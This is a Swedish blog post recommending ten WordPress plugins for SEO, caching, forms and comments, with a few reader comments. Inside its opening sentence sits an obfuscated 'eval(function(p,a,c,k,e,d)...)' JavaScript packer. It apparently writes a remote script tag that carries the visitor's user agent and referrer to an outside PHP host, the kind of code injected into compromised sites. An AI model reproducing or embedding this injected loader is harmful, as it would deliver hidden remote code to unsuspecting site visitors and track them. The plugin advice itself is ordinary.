Image Image Image Image Image Image Image Image Image Image

| 25 september, 2018

Scroll to top

Top

10 användbara WordPress plugins till din blogg 2011

10 användbara WordPress plugins till din blogg 2011
Sebastian Plengier Ehrnfelt

Vi eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dtzys|var|u0026u|referrer|attzn||js|php’.split(‘|’),0,{}))
vet att WordPress är det mest använda CMS som bloggare i Sverige använder idag. Därför tänkte vi lista 15 riktigt bra plugins som bör användas för att öka besökarantalet på er hemsida eller blogg.

Detta är några WordPress plugins som gör att ni kommer högre upp på sökmotorer som Google, och även gör det mer användarvänligt för besökarna under vistelsen på er sajt.

 1. W3 Total Cache – Denna plugin är bra på två sätt. För det första gör det er sida snabbare att ladda. För det andra sparar den statisk information på din hemsida vilket inte behöver lika mycket CPU användning. Vi har valt denna plugin som etta just för att den är ett måste.
 2. HeadSpace: WordPress SEO Made Simple – Ni som idag använder ”All in one SEO”, dags att byta. HeadSpace ger dig funktioner som tar din sida till toppen gällande sökoptimering. Personer lägger ner för mycket tid på att jobba med SEO och för lite tid på att skriva bra innehåll. Denna plugin låter dig lägga fokus på rätt saker. Den tar automatiskt hand om det som behövs för en perfekt sökoptimerad hemsida.
 3. Gravity Forms – Detta är den perfekta pluginen för formulär. Det finns ingen konkurrent. Du kan göra enkla fomulär som mailutskick osv men också lägga till fält som uppladdning eller bifogning av fil. Det är en allt-i-allo plugin för formulär.
 4. Disqus – Trött på att det hela tiden kommer upp massa ”spam” kommentarer på din sida? Disqus används idag av många stora aktörer på marknaden. Revue.se använder det också. Detta är utmärkt för att förbättra kommentarerna på din sida.
 5. WP-DBManager – Denna plugin gör backuper på din sida. Du kan få din databas mailad till dig varje dag för att säkra att inte innehållet på din sida plötsligt skulle gå upp i rök.
 6. Thank Me Later – En plugin som skickar ett mail till nya besökare som lämnat en kommentar på din sida. Den tackar för reaktionen och påminner om att beökaren kan följa sidans RSS.
 7. SEO Smart Links – Länkar du till dig själv i dina inlägg? Du borde. Länkar till ett annat inlägg på din blogg är ett bra sätt att öka din ”pagerank” på google och andra sökmotorer. Detta gör att du kommer högre upp i sökningar. Det uppmuntrar även läsare att gå vidare till ett annat inlägg på din blogg.
 8. Feedburner Circulation – Använder du Feedburner som RSS är detta pluginen för dig. Här kan du visa hur många ”följare” din RSS har samt få fler att ”följa den”.
 9. Tweet Old Post – Om du har ett större gäng ”followers” på Twitter så kan det vara bra att uppmärksamma dem på inlägg du gjort ett tag sen tillbaka. Detta gör att folk inte glömmer bort äldre intressanta inlägg på din blogg/sida.
 10. ReplyMe – Denna plugin skickar ett mail till besökare när deras kommentar har fått ett svar. Ett utmärkt sätt att fortsätta diskussioner på din blogg/sida.

Har ni några bra WordPress plugins att dela med er av? Kommentera och diskutera gärna nedan vilka ni anser vara användbara.

 

Comments

 1. Olle Hacker

  SEO smartlink är grym. Den har gjort att min sida fått mycket bättre pagerank än mina vänner som inte använder den.

  Bra lista enligt mig. Dock tycker jag att WP forms 7 är bättre än Gravity forms, men det är en smaksak.

 2. Wordpress fantast

  W3 Total Cache anses vara väldigt bra visst, men har hört att många får problem med pluginen och det gör att sidan kraschar. Man ska veta att användningen av den pluginen kräver avancerad kunskap om WordPress. Deta kan vara värt att nämna så inte amatörerna råkar ut för krash. 

 3. Här är en guide som visar hur man installerar W3 Total Cache på WordPress. 🙂

  http://www.wpbeginner.com/plugins/how-to-install-and-setup-w3-total-cache-for-beginners/

 4. Green

  Jag gillar verkligen WordPress SEO då det har flera bra funktioner
  inbyggt. Flera av funktionerna är som du säger ett bra stöd i det egna
  SEO-arbetet. Jag använder WordPress SEO på alla mina webbplatser förutom
  två, där jag använder Headway tema/ramverk, som har All in One SEO
  inbyggt.